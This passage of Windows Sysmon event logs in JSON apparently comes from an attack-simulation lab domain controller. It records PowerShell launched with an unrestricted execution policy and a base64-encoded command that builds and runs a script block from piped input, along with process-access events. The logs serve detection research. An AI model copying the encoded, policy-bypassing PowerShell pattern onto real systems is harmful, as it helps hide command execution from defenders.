-NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.603","ProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-001089B80600}","ParentProcessId":"3904","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001089B80600}\r\nSourceProcessId: 3904\r\nSourceThreadId: 4924\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fecd40ab|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175185|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe174e56|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fec2626b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe1359ec|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe193ebb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe177520|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe177520|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe1773b1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe169336|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175869|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe17545c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175185|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe174e56|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fec2626b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe15bcb7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe15b287","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001089B80600}","SourceProcessId":"3904","SourceThreadId":"4924","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fecd40ab|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175185|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe174e56|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fec2626b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe1359ec|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe193ebb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe177520|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe177520|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe1773b1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe169336|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175869|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe17545c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe175185|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe174e56|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fec2626b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe15bcb7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+fe15b287","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 